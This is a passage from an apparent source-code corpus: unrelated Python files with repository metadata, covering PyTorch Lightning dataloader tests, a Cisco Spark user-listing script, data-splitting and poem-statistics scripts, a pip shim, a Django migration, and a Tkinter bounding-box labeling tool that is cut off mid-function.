    sampler = SequentialSampler(ds)
    match = escape("missing attributes are ['num_feat']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="fit")
    match = escape("missing attributes are ['num_feat']")
    with pytest.raises(MisconfigurationException, match=match):
        trainer.replace_sampler(loader, sampler, mode="predict")
def test_replace_sampler_with_multiprocessing_context():
    """replace_sampler must preserve the loader's multiprocessing context
    (e.g. "spawn") when it rebuilds the DataLoader."""
    train = RandomDataset(32, 64)
    context = "spawn"
    train = DataLoader(train, batch_size=32, num_workers=2, multiprocessing_context=context, shuffle=True)
    trainer = Trainer()
    new_data_loader = trainer.replace_sampler(train, SequentialSampler(train.dataset))
    assert new_data_loader.multiprocessing_context == train.multiprocessing_context
def test_dataloader_reinit_for_subclass():
    """auto_add_sampler keeps the concrete DataLoader subclass (and leaves
    non-DataLoader duck-typed objects alone) when injecting a distributed
    sampler, and refuses to silently replace a user-provided sampler."""

    class CustomDataLoader(DataLoader):
        def __init__(
            self,
            dataset,
            batch_size=1,
            shuffle=False,
            sampler=None,
            batch_sampler=None,
            num_workers=0,
            collate_fn=None,
            pin_memory=False,
            drop_last=False,
            timeout=0,
            worker_init_fn=None,
            dummy_kwarg=None,
        ):
            super().__init__(
                dataset,
                batch_size,
                shuffle,
                sampler,
                batch_sampler,
                num_workers,
                collate_fn,
                pin_memory,
                drop_last,
                timeout,
                worker_init_fn,
            )
            self.dummy_kwarg = dummy_kwarg
            self.something_unrelated = 1

    trainer = Trainer(num_processes=1, accelerator="ddp_cpu")

    # Duck-typed object with a `sampler` attribute must pass through as-is.
    class CustomDummyObj:
        sampler = None

    result = trainer.auto_add_sampler(CustomDummyObj(), shuffle=True)
    assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"

    dataset = list(range(10))
    result = trainer.auto_add_sampler(CustomDataLoader(dataset), shuffle=True)
    assert isinstance(result, DataLoader)
    assert isinstance(result, CustomDataLoader)
    assert result.dummy_kwarg is None

    # Shuffled DataLoader should also work
    result = trainer.auto_add_sampler(CustomDataLoader(dataset, shuffle=True), shuffle=True)
    assert isinstance(result, DataLoader)
    assert isinstance(result, CustomDataLoader)
    assert result.dummy_kwarg is None

    class CustomSampler(Sampler):
        pass

    # Should raise an error if existing sampler is being replaced
    dataloader = CustomDataLoader(dataset, sampler=CustomSampler(dataset))
    with pytest.raises(MisconfigurationException, match="will be replaced by `DistributedSampler`"):
        trainer.auto_add_sampler(dataloader, shuffle=True)
def test_loader_detaching():
    """Checks that the loader has been reset after each Trainer entrypoint:
    inside fit/validate/test/predict the model sees the loader passed to the
    entrypoint (length 10), and afterwards its own dataloaders (length 64)."""

    class LoaderTestModel(BoringModel):
        def training_step(self, batch, batch_idx):
            assert len(model.train_dataloader()) == 10
            return super().training_step(batch, batch_idx)

        def validation_step(self, batch, batch_idx):
            assert len(model.val_dataloader()) == 10
            return super().validation_step(batch, batch_idx)

        def test_step(self, batch, batch_idx):
            assert len(model.test_dataloader()) == 10
            return super().test_step(batch, batch_idx)

        def predict_step(self, batch, batch_idx, dataloader_idx=None):
            assert len(model.predict_dataloader()) == 10
            return super().predict_step(batch, batch_idx, dataloader_idx=dataloader_idx)

    loader = DataLoader(RandomDataset(32, 10), batch_size=1)

    model = LoaderTestModel()

    assert len(model.train_dataloader()) == 64
    assert len(model.val_dataloader()) == 64
    assert len(model.predict_dataloader()) == 64
    assert len(model.test_dataloader()) == 64

    trainer = Trainer(fast_dev_run=1)
    trainer.fit(model, loader, loader)

    assert len(model.train_dataloader()) == 64
    assert len(model.val_dataloader()) == 64
    assert len(model.predict_dataloader()) == 64
    assert len(model.test_dataloader()) == 64

    trainer.validate(model, loader)

    assert len(model.train_dataloader()) == 64
    assert len(model.val_dataloader()) == 64
    assert len(model.predict_dataloader()) == 64
    assert len(model.test_dataloader()) == 64

    trainer.predict(model, loader)

    assert len(model.train_dataloader()) == 64
    assert len(model.val_dataloader()) == 64
    assert len(model.predict_dataloader()) == 64
    assert len(model.test_dataloader()) == 64

    trainer.test(model, loader)

    assert len(model.train_dataloader()) == 64
    assert len(model.val_dataloader()) == 64
    assert len(model.predict_dataloader()) == 64
    assert len(model.test_dataloader()) == 64
| [
"[email protected]"
] | |
aa3ac1974fafdcc4d0ecbbb8b81994e2958b1715 | 96e29b0815de8a774fe15aefbfedcfb4d4a78f01 | /FreeUsers.py | 8de8965739d9e9ad2d8516fc090b3a9dff4f92f6 | [] | no_license | gj0nyg/Spark-Tools | 23bdebc0220d4f9db850f6b5834e114fc56b18e5 | d0163e41b4f1e3bfa6cd2609445aeddbbde68325 | refs/heads/master | 2021-06-30T02:19:41.869237 | 2017-09-15T12:17:53 | 2017-09-15T12:17:53 | 103,482,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | #!/usr/local/bin/python3
# Code borrows heavily from Cisco Devnet lessons
from ciscosparkapi import CiscoSparkAPI, SparkApiError
import os
import sys
if __name__ == '__main__':
# Command line arguments parsing
from argparse import ArgumentParser
parser = ArgumentParser("ConvertUsers.py")
parser.add_argument("-t", "--token", help="[optional] your admin access token. Alternatively, you can use the SPARK_ACCESS_TOKEN env variable", required=False)
args = parser.parse_args()
access_token = args.token
# Check access token
spark_access_token = os.environ.get("SPARK_ACCESS_TOKEN")
token = access_token if access_token else spark_access_token
if not token:
error_message = "You must provide a Cisco Spark API access token to " \
"interact with the Cisco Spark APIs, either via " \
"a SPARK_ACCESS_TOKEN environment variable " \
"or via the -t command line argument."
print(error_message)
sys.exit(2)
try:
FreeUser=[]
api = CiscoSparkAPI(access_token=token)
users=api.people.list()
for user in users:
userDetails=api.people.get(personId=user.id)
if userDetails.licenses == []:
FreeUser.append(userDetails.emails[0])
print (userDetails.emails[0])
# print(FreeUser)
except SparkApiError as e:
print("failed with statusCode: %d" % e.response_code)
if e.response_code == 404:
print ("user is invalid")
elif e.response_code == 400:
print ("the request was invalid")
elif e.response_code == 401:
print ("please check the Cisco Spark token is correct...")
| [
"[email protected]"
] | |
4d65297c73e965cf8f0fa945c1dd72e7c6af914c | 0b8670d95816cde1ceaa2e87c5a782c50073fc64 | /NLP Senti_analysis/程序源代码/Train/Preprocess/process.py | d064bd6f53f91b6e1c961e3c551d95913e7e5b61 | [] | no_license | joyjiuyi/UCAS_NLP-1 | fd047c6e42a8d3bb7ced5922f8daf72774df530f | 23fe692bdfce3706933425c501ea742b7d073077 | refs/heads/master | 2022-05-06T03:30:03.204529 | 2018-11-24T06:11:24 | 2018-11-24T06:11:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #训练集\验证集划分
import sys
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
if __name__ == '__main__':
df = pd.read_csv('data.csv')
y = df.iloc[:,1]
x = df.iloc[:,2:]
x_train, x_test, y_train, y_test = train_test_split(x, y, random_state=42, train_size=0.95)
xtest = pd.DataFrame(x_test)
ytest = pd.DataFrame(y_test)
test = pd.concat([ytest,xtest],axis = 1)
test.to_csv('test.csv')
xtrain = pd.DataFrame(x_train)
ytrain = pd.DataFrame(y_train)
train = pd.concat([ytrain,xtrain],axis=1)
train.to_csv('train.csv')
| [
"[email protected]"
] | |
31e1e3bd3ba2ce4e49a925c97fabf5020e9c43d7 | c875692c864debde738215a0d08872a3ac3d5b92 | /pace_statistic.py | 2909c3124567e14bacd72f470237850892469e16 | [] | no_license | camelop/naive_poem_writer | 4f94ae17f88f39f08ac0db53bd4a55ae53b07bf4 | 9ecbfdf31804b044960962e3a8c4e4fffc3bbca1 | refs/heads/master | 2021-05-15T12:57:16.961046 | 2017-10-26T16:56:07 | 2017-10-26T16:56:10 | 108,439,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | import pickle
from poem import Poem
# Load the pickled list of Poem objects produced elsewhere.
with open('poem_list.data', 'rb') as f:
    poem_list = pickle.load(f)

# Group poems by their pace signature (tuple of line lengths, stringified so
# it can be used as a dict key).
pace_s = {}
for p in poem_list:
    pace_nw = str(p.pace())
    if pace_nw in pace_s:
        pace_s[pace_nw].append(p)
    else:
        pace_s[pace_nw] = [p]

# Inspect the five most common pace signatures (reporting disabled).
for index, pace in enumerate(sorted(pace_s.items(), key=lambda f: len(f[1]), reverse=True)):
    if index > 4:
        break
    # print("Pace: ", pace[0], "\t# ", len(pace[1]))

# 5-character, 8-line poems: count character bigrams (f_5_8) and single
# characters (c_5_8) across every line.
p_5_8 = pace_s[str((5, 5, 5, 5, 5, 5, 5, 5))]
f_5_8 = {}
c_5_8 = {}
for p in p_5_8:
    for line in p.content:
        for i in range(4):
            word = line[i] + line[i + 1]
            if word in f_5_8:
                f_5_8[word] += 1
            else:
                f_5_8[word] = 1
        for c in line:
            if c in c_5_8:
                c_5_8[c] += 1
            else:
                c_5_8[c] = 1

# 7-character poems (4- or 8-line): same bigram/character statistics.
p_7 = pace_s[str((7, 7, 7, 7))] + pace_s[str((7, 7, 7, 7, 7, 7, 7, 7))]
f_7 = {}
c_7 = {}
for p in p_7:
    for line in p.content:
        for i in range(6):
            word = line[i] + line[i + 1]
            if word in f_7:
                f_7[word] += 1
            else:
                f_7[word] = 1
        for c in line:
            if c in c_7:
                c_7[c] += 1
            else:
                c_7[c] = 1
'''
for i in range(1000, 1005):
    print(p_5_8[i])
'''
| [
"[email protected]"
] | |
6487119fd016b50af8b9e741625a98c8853f21ed | 0a303585b67defefb8df983e8d5395815c2ee0b2 | /bin/pip | 8e43107fe3d24cee92c5efbeae0e3731c8179197 | [] | no_license | wangqian121/python3-learn | 83c87d62887552dbbe4c41ddc891ff1a863da35b | c8c83ebdd324501c4deeb2026c9ee1f058e1bf64 | refs/heads/master | 2020-12-24T04:44:27.902787 | 2020-05-15T09:56:44 | 2020-05-15T09:56:44 | 237,384,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 384 | #!/Users/wangqian/untitled/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Auto-generated setuptools console-script shim for pip 19.0.3: normalize
    # argv[0] (strip -script.py / .exe suffixes) and dispatch to the entry
    # point registered under 'console_scripts'.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
    )
| [
"[email protected]"
] | ||
74078e9e213ca05dd92ef137c041b24c9432e58a | 45c539b7aefbeba43aa1623f53029325b0f8c325 | /kcdc3/apps/classes/migrations/0016_auto__add_field_event_status__add_field_event_featured__add_field_even.py | f3847e8d1fd3dfec5631ec7e4bdcc54b3facd065 | [
"MIT"
] | permissive | knowledgecommonsdc/kcdc3 | f855fd07861ac30b2e0493ff6b788e6140e6df52 | 573b836b052081c0e4137076574fc987535e1aa8 | refs/heads/master | 2021-12-12T02:43:14.814991 | 2017-10-04T14:59:22 | 2017-10-04T14:59:22 | 4,991,118 | 3 | 3 | MIT | 2021-12-02T17:56:48 | 2012-07-11T15:42:11 | Python | UTF-8 | Python | false | false | 14,415 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply: add the new Event columns (status/featured, location_*,
        images, e-mail texts, documentation), create the Event<->User
        'facilitators' M2M join table, and widen location_description."""
        # Adding field 'Event.status'
        db.add_column('classes_event', 'status',
                      self.gf('django.db.models.fields.CharField')(default='PUBLISHED', max_length=9),
                      keep_default=False)

        # Adding field 'Event.featured'
        db.add_column('classes_event', 'featured',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)

        # Adding field 'Event.additional_dates_text'
        db.add_column('classes_event', 'additional_dates_text',
                      self.gf('django.db.models.fields.TextField')(default='', blank=True),
                      keep_default=False)

        # Adding field 'Event.location_name'
        db.add_column('classes_event', 'location_name',
                      self.gf('django.db.models.fields.TextField')(default='', max_length=100, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_address1'
        db.add_column('classes_event', 'location_address1',
                      self.gf('django.db.models.fields.TextField')(default='', max_length=60, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_address2'
        db.add_column('classes_event', 'location_address2',
                      self.gf('django.db.models.fields.TextField')(default='', max_length=60, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_city'
        db.add_column('classes_event', 'location_city',
                      self.gf('django.db.models.fields.TextField')(default='Washington', max_length=60, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_state'
        db.add_column('classes_event', 'location_state',
                      self.gf('django.db.models.fields.TextField')(default='DC', max_length=2, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_zip'
        db.add_column('classes_event', 'location_zip',
                      self.gf('django.db.models.fields.TextField')(default='', max_length=5, blank=True),
                      keep_default=False)

        # Adding field 'Event.location_show_exact'
        db.add_column('classes_event', 'location_show_exact',
                      self.gf('django.db.models.fields.BooleanField')(default=True),
                      keep_default=False)

        # Adding field 'Event.thumbnail'
        db.add_column('classes_event', 'thumbnail',
                      self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True),
                      keep_default=False)

        # Adding field 'Event.main_image'
        db.add_column('classes_event', 'main_image',
                      self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True),
                      keep_default=False)

        # Adding field 'Event.email_welcome_text'
        db.add_column('classes_event', 'email_welcome_text',
                      self.gf('django.db.models.fields.TextField')(default='', blank=True),
                      keep_default=False)

        # Adding field 'Event.email_reminder'
        db.add_column('classes_event', 'email_reminder',
                      self.gf('django.db.models.fields.BooleanField')(default=True),
                      keep_default=False)

        # Adding field 'Event.email_reminder_text'
        db.add_column('classes_event', 'email_reminder_text',
                      self.gf('django.db.models.fields.TextField')(default='', blank=True),
                      keep_default=False)

        # Adding field 'Event.documentation'
        db.add_column('classes_event', 'documentation',
                      self.gf('django.db.models.fields.TextField')(default='', blank=True),
                      keep_default=False)

        # Adding M2M table for field facilitators on 'Event'
        db.create_table('classes_event_facilitators', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('event', models.ForeignKey(orm['classes.event'], null=False)),
            ('user', models.ForeignKey(orm['auth.user'], null=False))
        ))
        db.create_unique('classes_event_facilitators', ['event_id', 'user_id'])

        # Changing field 'Event.location_description'
        db.alter_column('classes_event', 'location_description', self.gf('django.db.models.fields.TextField')())
def backwards(self, orm):
# Deleting field 'Event.status'
db.delete_column('classes_event', 'status')
# Deleting field 'Event.featured'
db.delete_column('classes_event', 'featured')
# Deleting field 'Event.additional_dates_text'
db.delete_column('classes_event', 'additional_dates_text')
# Deleting field 'Event.location_name'
db.delete_column('classes_event', 'location_name')
# Deleting field 'Event.location_address1'
db.delete_column('classes_event', 'location_address1')
# Deleting field 'Event.location_address2'
db.delete_column('classes_event', 'location_address2')
# Deleting field 'Event.location_city'
db.delete_column('classes_event', 'location_city')
# Deleting field 'Event.location_state'
db.delete_column('classes_event', 'location_state')
# Deleting field 'Event.location_zip'
db.delete_column('classes_event', 'location_zip')
# Deleting field 'Event.location_show_exact'
db.delete_column('classes_event', 'location_show_exact')
# Deleting field 'Event.thumbnail'
db.delete_column('classes_event', 'thumbnail')
# Deleting field 'Event.main_image'
db.delete_column('classes_event', 'main_image')
# Deleting field 'Event.email_welcome_text'
db.delete_column('classes_event', 'email_welcome_text')
# Deleting field 'Event.email_reminder'
db.delete_column('classes_event', 'email_reminder')
# Deleting field 'Event.email_reminder_text'
db.delete_column('classes_event', 'email_reminder_text')
# Deleting field 'Event.documentation'
db.delete_column('classes_event', 'documentation')
# Removing M2M table for field facilitators on 'Event'
db.delete_table('classes_event_facilitators')
# Changing field 'Event.location_description'
db.alter_column('classes_event', 'location_description', self.gf('django.db.models.fields.TextField')(max_length=200))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'classes.event': {
'Meta': {'ordering': "['date']", 'object_name': 'Event'},
'additional_dates_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'documentation': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_reminder': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'email_reminder_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email_welcome_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'facilitators': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'facilitators'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location_address1': ('django.db.models.fields.TextField', [], {'max_length': '60', 'blank': 'True'}),
'location_address2': ('django.db.models.fields.TextField', [], {'max_length': '60', 'blank': 'True'}),
'location_city': ('django.db.models.fields.TextField', [], {'default': "'Washington'", 'max_length': '60', 'blank': 'True'}),
'location_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'location_name': ('django.db.models.fields.TextField', [], {'max_length': '100', 'blank': 'True'}),
'location_show_exact': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location_state': ('django.db.models.fields.TextField', [], {'default': "'DC'", 'max_length': '2', 'blank': 'True'}),
'location_zip': ('django.db.models.fields.TextField', [], {'max_length': '5', 'blank': 'True'}),
'main_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'max_students': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'registration_status': ('django.db.models.fields.CharField', [], {'default': "'AUTO'", 'max_length': '7'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'PUBLISHED'", 'max_length': '9'}),
'students': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'students'", 'to': "orm['auth.User']", 'through': "orm['classes.Registration']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'summary': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'teachers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'teachers'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'waitlist_status': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'classes.registration': {
'Meta': {'ordering': "['date_registered']", 'object_name': 'Registration'},
'attended': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'cancelled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_cancelled': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_registered': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['classes.Event']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'student': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'waitlist': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['classes'] | [
"[email protected]"
] | |
be1283b73ee741d767063e871b3ee06309038aa2 | 0fc2f0277c68758b5da261dab12cf45b32d45f0b | /main.py | e0e11198ee497cf87f4533922c7a607ad5f18277 | [] | no_license | sysadminamit/Bbox-Label-Tool-For-Multi-Class | af1a2c4792ba28cb6647a9100488fd06177e1cb0 | 05106fceb9d1d2c8d775fb4edb2e84e45aeb90a1 | refs/heads/master | 2020-04-28T18:20:06.922178 | 2019-03-13T18:19:47 | 2019-03-13T18:19:47 | 175,475,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,297 | py | from tkinter import *
from tkinter import filedialog
from tkinter import messagebox
from tkinter import ttk
from PIL import Image, ImageTk
import os
import glob
import random
# colors for the bboxes
COLORS = ['red', 'blue','pink', 'cyan', 'green', 'black']
# image sizes for the examples
SIZE = 256, 256
class LabelTool():
def __init__(self, master):
# set up the main frame
self.parent = master
self.parent.title("LabelTool")
self.frame = Frame(self.parent)
self.frame.pack(fill=BOTH, expand=1)
self.parent.resizable(width = FALSE, height = FALSE)
# initialize global state
self.imageDir = ''
self.imageList= []
self.egDir = ''
self.egList = []
self.outDir = ''
self.cur = 0
self.total = 0
self.category = 0
self.imagename = ''
self.labelfilename = ''
self.tkimg = None
self.currentLabelclass = ''
self.cla_can_temp = []
self.classcandidate_filename = 'class.txt'
# initialize mouse state
self.STATE = {}
self.STATE['click'] = 0
self.STATE['x'], self.STATE['y'] = 0, 0
# reference to bbox
self.bboxIdList = []
self.bboxId = None
self.bboxList = []
self.hl = None
self.vl = None
# ----------------- GUI stuff ---------------------
# dir entry & load
# input image dir button
self.srcDirBtn = Button(self.frame, text="Image input folder", command=self.selectSrcDir)
self.srcDirBtn.grid(row=0, column=0)
# input image dir entry
self.svSourcePath = StringVar()
self.entrySrc = Entry(self.frame, textvariable=self.svSourcePath)
self.entrySrc.grid(row=0, column=1, sticky=W+E)
self.svSourcePath.set(os.getcwd())
# load button
self.ldBtn = Button(self.frame, text="Load Dir", command=self.loadDir)
self.ldBtn.grid(row=0, column=2, rowspan=2, columnspan=2, padx=2, pady=2, ipadx=5, ipady=5)
# label file save dir button
self.desDirBtn = Button(self.frame, text="Label output folder", command=self.selectDesDir)
self.desDirBtn.grid(row=1, column=0)
# label file save dir entry
self.svDestinationPath = StringVar()
self.entryDes = Entry(self.frame, textvariable=self.svDestinationPath)
self.entryDes.grid(row=1, column=1, sticky=W+E)
self.svDestinationPath.set(os.path.join(os.getcwd(),"Labels"))
# main panel for labeling
self.mainPanel = Canvas(self.frame, cursor='tcross')
self.mainPanel.bind("<Button-1>", self.mouseClick)
self.mainPanel.bind("<Motion>", self.mouseMove)
self.parent.bind("<Escape>", self.cancelBBox) # press <Espace> to cancel current bbox
self.parent.bind("s", self.cancelBBox)
self.parent.bind("p", self.prevImage) # press 'p' to go backforward
self.parent.bind("n", self.nextImage) # press 'n' to go forward
self.mainPanel.grid(row = 2, column = 1, rowspan = 4, sticky = W+N)
# choose class
self.classname = StringVar()
self.classcandidate = ttk.Combobox(self.frame, state='readonly', textvariable=self.classname)
self.classcandidate.grid(row=2, column=2)
if os.path.exists(self.classcandidate_filename):
with open(self.classcandidate_filename) as cf:
for line in cf.readlines():
self.cla_can_temp.append(line.strip('\n'))
self.classcandidate['values'] = self.cla_can_temp
self.classcandidate.current(0)
self.currentLabelclass = self.classcandidate.get()
self.btnclass = Button(self.frame, text='ComfirmClass', command=self.setClass)
self.btnclass.grid(row=2, column=3, sticky=W+E)
# showing bbox info & delete bbox
self.lb1 = Label(self.frame, text = 'Bounding boxes:')
self.lb1.grid(row = 3, column = 2, sticky = W+N)
self.listbox = Listbox(self.frame, width = 22, height = 12)
self.listbox.grid(row = 4, column = 2, sticky = N+S)
self.btnDel = Button(self.frame, text = 'Delete', command = self.delBBox)
self.btnDel.grid(row = 4, column = 3, sticky = W+E+N)
self.btnClear = Button(self.frame, text = 'ClearAll', command = self.clearBBox)
self.btnClear.grid(row = 4, column = 3, sticky = W+E+S)
# control panel for image navigation
self.ctrPanel = Frame(self.frame)
self.ctrPanel.grid(row = 6, column = 1, columnspan = 2, sticky = W+E)
self.prevBtn = Button(self.ctrPanel, text='<< Prev', width = 10, command = self.prevImage)
self.prevBtn.pack(side = LEFT, padx = 5, pady = 3)
self.nextBtn = Button(self.ctrPanel, text='Next >>', width = 10, command = self.nextImage)
self.nextBtn.pack(side = LEFT, padx = 5, pady = 3)
self.progLabel = Label(self.ctrPanel, text = "Progress: / ")
self.progLabel.pack(side = LEFT, padx = 5)
self.tmpLabel = Label(self.ctrPanel, text = "Go to Image No.")
self.tmpLabel.pack(side = LEFT, padx = 5)
self.idxEntry = Entry(self.ctrPanel, width = 5)
self.idxEntry.pack(side = LEFT)
self.goBtn = Button(self.ctrPanel, text = 'Go', command = self.gotoImage)
self.goBtn.pack(side = LEFT)
# example pannel for illustration
self.egPanel = Frame(self.frame, border = 10)
self.egPanel.grid(row = 3, column = 0, rowspan = 5, sticky = N)
self.tmpLabel2 = Label(self.egPanel, text = "Examples:")
self.tmpLabel2.pack(side = TOP, pady = 5)
self.egLabels = []
for i in range(3):
self.egLabels.append(Label(self.egPanel))
self.egLabels[-1].pack(side = TOP)
# display mouse position
self.disp = Label(self.ctrPanel, text='')
self.disp.pack(side = RIGHT)
self.frame.columnconfigure(1, weight = 1)
self.frame.rowconfigure(4, weight = 1)
def selectSrcDir(self):
path = filedialog.askdirectory(title="Select image source folder", initialdir=self.svSourcePath.get())
self.svSourcePath.set(path)
return
def selectDesDir(self):
path = filedialog.askdirectory(title="Select label output folder", initialdir=self.svDestinationPath.get())
self.svDestinationPath.set(path)
return
def loadDir(self):
self.parent.focus()
# get image list
#self.imageDir = os.path.join(r'./Images', '%03d' %(self.category))
self.imageDir = self.svSourcePath.get()
if not os.path.isdir(self.imageDir):
messagebox.showerror("Error!", message = "The specified dir doesn't exist!")
return
extlist = ["*.JPEG", "*.jpeg", "*JPG", "*.jpg", "*.PNG", "*.png", "*.BMP", "*.bmp"]
for e in extlist:
filelist = glob.glob(os.path.join(self.imageDir, e))
self.imageList.extend(filelist)
#self.imageList = glob.glob(os.path.join(self.imageDir, '*.JPEG'))
if len(self.imageList) == 0:
print('No .JPEG images found in the specified dir!')
return
# default to the 1st image in the collection
self.cur = 1
self.total = len(self.imageList)
# set up output dir
#self.outDir = os.path.join(r'./Labels', '%03d' %(self.category))
self.outDir = self.svDestinationPath.get()
if not os.path.exists(self.outDir):
os.mkdir(self.outDir)
# load example bboxes
#self.egDir = os.path.join(r'./Examples', '%03d' %(self.category))
self.egDir = os.path.join(os.getcwd(), "Examples/001")
if not os.path.exists(self.egDir):
return
filelist = glob.glob(os.path.join(self.egDir, '*.JPEG'))
self.tmp = []
self.egList = []
random.shuffle(filelist)
for (i, f) in enumerate(filelist):
if i == 1:
break
im = Image.open(f)
r = min(SIZE[0] / im.size[0], SIZE[1] / im.size[1])
new_size = int(r * im.size[0]), int(r * im.size[1])
self.tmp.append(im.resize(new_size, Image.ANTIALIAS))
self.egList.append(ImageTk.PhotoImage(self.tmp[-1]))
self.egLabels[i].config(image = self.egList[-1], width = SIZE[0], height = SIZE[1])
self.loadImage()
print('%d images loaded from %s' %(self.total, self.imageDir))
def loadImage(self):
# load image
imagepath = self.imageList[self.cur - 1]
self.img = Image.open(imagepath)
size = self.img.size
self.factor = max(size[0]/1000, size[1]/1000., 1.)
self.img = self.img.resize((int(size[0]/self.factor), int(size[1]/self.factor)))
self.tkimg = ImageTk.PhotoImage(self.img)
self.mainPanel.config(width = max(self.tkimg.width(), 400), height = max(self.tkimg.height(), 400))
self.mainPanel.create_image(0, 0, image = self.tkimg, anchor=NW)
self.progLabel.config(text = "%04d/%04d" %(self.cur, self.total))
# load labels
self.clearBBox()
#self.imagename = os.path.split(imagepath)[-1].split('.')[0]
fullfilename = os.path.basename(imagepath)
